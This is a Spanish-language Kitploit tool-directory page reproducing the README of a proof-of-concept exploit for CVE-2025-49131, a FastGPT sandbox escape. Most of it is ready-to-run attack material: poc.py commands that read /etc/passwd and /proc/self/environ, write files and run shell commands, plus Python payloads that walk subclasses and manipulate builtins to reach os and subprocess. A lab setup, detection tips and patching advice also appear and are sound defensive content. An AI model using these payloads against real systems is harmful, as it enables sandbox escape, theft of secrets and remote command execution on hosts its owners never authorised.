Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2025-49131-poc — Exploit de prueba de concepto para CVE-2025-49131, una vulnerabilidad de escape de sandbox de FastGPT. Permite lectura/escritura de archivos, omisión de importaciones y ejecución remota de código para pruebas de seguridad autorizadas. | Kitploit
Herramientas/GitHubGitHub/wenura17125/cve-2025-49131-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónHerramienta de Acceso RemotoEscape de Contenedores
GitHubwenura17125/cve-2025-49131-poc

cve-2025-49131-poc

Exploit de prueba de concepto para CVE-2025-49131, una vulnerabilidad de escape de sandbox de FastGPT. Permite lectura/escritura de archivos, omisión de importaciones y ejecución remota de código para pruebas de seguridad autorizadas.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 7 mesesAún no revisado

CVE-2025-49131 - POC de Escape de Sandbox FastGPT

root@kitploit:~
 ███████╗ █████╗ ███████╗████████╗ ██████╗ ██████╗ ████████╗
 ██╔════╝██╔══██╗██╔════╝╚══██╔══╝██╔════╝ ██╔══██╗╚══██╔══╝
 █████╗  ███████║███████╗   ██║   ██║  ███╗██████╔╝   ██║   
 ██╔══╝  ██╔══██║╚════██║   ██║   ██║   ██║██╔═══╝    ██║   
 ██║     ██║  ██║███████║   ██║   ╚██████╔╝██║        ██║   
 ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝    ╚═════╝ ╚═╝        ╚═╝   
                                                            
 ███████╗ █████╗ ███╗   ██╗██████╗ ██████╗  ██████╗ ██╗  ██╗
 ██╔════╝██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔═══██╗╚██╗██╔╝
 ███████╗███████║██╔██╗ ██║██║  ██║██████╔╝██║   ██║ ╚███╔╝ 
 ╚════██║██╔══██║██║╚██╗██║██║  ██║██╔══██╗██║   ██║ ██╔██╗ 
 ███████║██║  ██║██║ ╚████║██████╔╝██████╔╝╚██████╔╝██╔╝ ██╗
 ╚══════╝╚═╝  ╚═╝╚═╝  ╚═══╝╚═════╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═╝
                                                            
 ███████╗███████╗ ██████╗ █████╗ ██████╗ ███████╗           
 ██╔════╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝           
 █████╗  ███████╗██║     ███████║██████╔╝█████╗             
 ██╔══╝  ╚════██║██║     ██╔══██║██╔═══╝ ██╔══╝             
 ███████╗███████║╚██████╗██║  ██║██║     ███████╗           
 ╚══════╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝     ╚══════╝           
                                                            
        ╔═══════════════════════════════════════╗
        ║     CVE-2025-49131 | CVSS 6.3        ║
        ║   FastGPT Sandbox Container Escape   ║
        ║      Affected: < v4.9.11             ║
        ╚═══════════════════════════════════════╝

🎯 Resumen de la Vulnerabilidad

⚠️ Aviso Legal

Esta herramienta es solo para fines de investigación de seguridad autorizada y educativos.

  • Pruebe únicamente en sistemas que posea o para los que tenga permiso explícito por escrito.
  • Siga las prácticas de divulgación responsable.
  • Cumpla con todas las leyes y regulaciones aplicables.

📖 Descripción

CVE-2025-49131 es una vulnerabilidad de escape de sandbox en el contenedor fastgpt-sandbox de FastGPT. La vulnerabilidad existe debido a:

  • Mecanismos de aislamiento insuficientes: el sandbox no restringe adecuadamente los builtins de Python.
  • Llamadas al sistema excesivamente permisivas: las syscalls peligrosas no están bloqueadas.
  • Restricciones de ejecución de código inadecuadas: las restricciones de importación pueden ser eludidas.

Impacto

Una explotación exitosa permite a un atacante:

  • ✅ Leer archivos arbitrarios: acceder a /etc/passwd, archivos de configuración, secretos.
  • ✅ Escribir archivos arbitrarios: modificar archivos del sistema, inyectar código malicioso.
  • ✅ Eludir restricciones de importación de Python: importar módulos os, subprocess.
  • ✅ Potencial RCE: ejecutar comandos del sistema a través de módulos importados.

🚀 Inicio Rápido

root@kitploit:~
# Clone this repository
git clone https://github.com/Wenura17125/cve-2025-49131-poc.git
cd cve-2025-49131-poc

# Install dependencies
pip install -r requirements.txt

# Run vulnerability detection
python poc.py --target http://localhost:3001 --detect

# Read a file
python poc.py --target http://localhost:3001 --read /etc/passwd

# Attempt RCE
python poc.py --target http://localhost:3001 --rce "id"

🔧 Configurar Entorno Vulnerable

root@kitploit:~
# Start vulnerable and patched containers
docker-compose up -d

# Vulnerable sandbox on port 3001
# Patched sandbox on port 3002

💻 Uso

Modo de Detección (No destructivo)

root@kitploit:~
python poc.py --target http://localhost:3001 --detect -v

Leer Archivos Arbitrarios

root@kitploit:~
python poc.py --target http://localhost:3001 --read /etc/passwd
python poc.py --target http://localhost:3001 --read /proc/self/environ

Escribir Archivos

root@kitploit:~
python poc.py --target http://localhost:3001 --write /tmp/pwned --content "CVE-2025-49131"

Omitir Importaciones

root@kitploit:~
python poc.py --target http://localhost:3001 --import os
python poc.py --target http://localhost:3001 --import subprocess

Variables de Entorno

root@kitploit:~
python poc.py --target http://localhost:3001 --env

Ejecución Remota de Comandos

root@kitploit:~
python poc.py --target http://localhost:3001 --rce "whoami"
python poc.py --target http://localhost:3001 --rce "cat /etc/passwd"

Opciones Completas

root@kitploit:~
python poc.py --help

📁 Estructura del Proyecto

root@kitploit:~
cve-2025-49131-poc/
├── poc.py                # Main exploit script
├── payloads.py           # Payload generator library
├── docker-compose.yml    # Test environment
├── requirements.txt      # Python dependencies
├── README.md             # This file
└── tests/
    └── test_exploit.py   # Automated tests

🔬 Detalles Técnicos

Causa Raíz de la Vulnerabilidad

El sandbox de FastGPT está diseñado para ejecutar código enviado por el usuario en un entorno aislado. Sin embargo, los mecanismos de aislamiento son insuficientes:

  1. Acceso a __builtins__ de Python: el sandbox no restringe adecuadamente el acceso a funciones integradas como open(), __import__(), etc.
  2. Filtrado de Syscalls: la lista de syscalls permitidas incluye llamadas peligrosas que permiten el acceso al sistema de archivos.
  3. Omisión de Restricciones de Importación: existen múltiples técnicas para eludir las restricciones de importación de módulos.

Flujo de Explotación

root@kitploit:~
┌─────────────────────────────────────────────┐
│ 1. Send malicious code to sandbox API       │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 2. Bypass sandbox restrictions using:       │
│    - __builtins__ manipulation              │
│    - Subclass walking                       │
│    - Import bypass techniques               │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 3. Gain access to:                          │
│    - File system (read/write)               │
│    - os/subprocess modules                  │
│    - Environment variables                  │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 4. Impact:                                  │
│    - Data exfiltration                      │
│    - Code injection                         │
│    - Remote command execution               │
└─────────────────────────────────────────────┘

Ejemplos de Payloads

Lectura de Archivos:

root@kitploit:~
open('/etc/passwd', 'r').read()
__builtins__.open('/etc/passwd').read()

Omisión de Importación:

root@kitploit:~
__import__('os')
__builtins__.__import__('os')
[x for x in ().__class__.__base__.__subclasses__() 
 if x.__name__=='catch_warnings'][0]()._module.__builtins__['__import__'](https://github.com/wenura17125/cve-2025-49131-poc/blob/HEAD/%27os%27)

RCE:

root@kitploit:~
__import__('os').popen('id').read()
__import__('subprocess').check_output('id', shell=True)

🛡️ Detección y Mitigación

Detección

Busque actividad sospechosa en los registros del sandbox:

  • Intentos de acceso a /etc/passwd, /etc/shadow
  • Llamadas a __builtins__, __import__
  • Uso del módulo subprocess u os
  • Operaciones inusuales de lectura/escritura de archivos

Mitigación

  1. Actualice FastGPT a la versión 4.9.11 o posterior.
  2. Aislamiento de red: limite el acceso de red del contenedor del sandbox.
  3. Límites de recursos: aplique límites de CPU/memoria a los contenedores.
  4. Monitoreo: implemente registro y alertas para las actividades del sandbox.

📚 Referencias

  • NVD - CVE-2025-49131
  • FastGPT GitHub
  • GitHub Security Advisory
  • FastGPT Documentation

⏱️ Cronología

FechaEvento
2025-??-??Vulnerabilidad descubierta
2025-??-??Proveedor notificado
2025-06-??Parche publicado (v4.9.11)
2025-06-09Divulgación pública

📄 Licencia

Este proyecto es solo para fines educativos y de investigación de seguridad autorizada. Úselo de manera responsable.


Creado para fines de investigación de seguridad. Siempre obtenga la autorización adecuada antes de realizar pruebas.

Descargar herramienta
CampoValor
ID CVECVE-2025-49131
Puntuación CVSS6.3 (Media)
Vector CVSSAV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Tipo de VulnerabilidadEscape de Sandbox
Software AfectadoContenedor FastGPT (fastgpt-sandbox)
Versiones Afectadas< 4.9.11
Versión Parcheada4.9.11+
Fecha de Divulgación9 de junio de 2025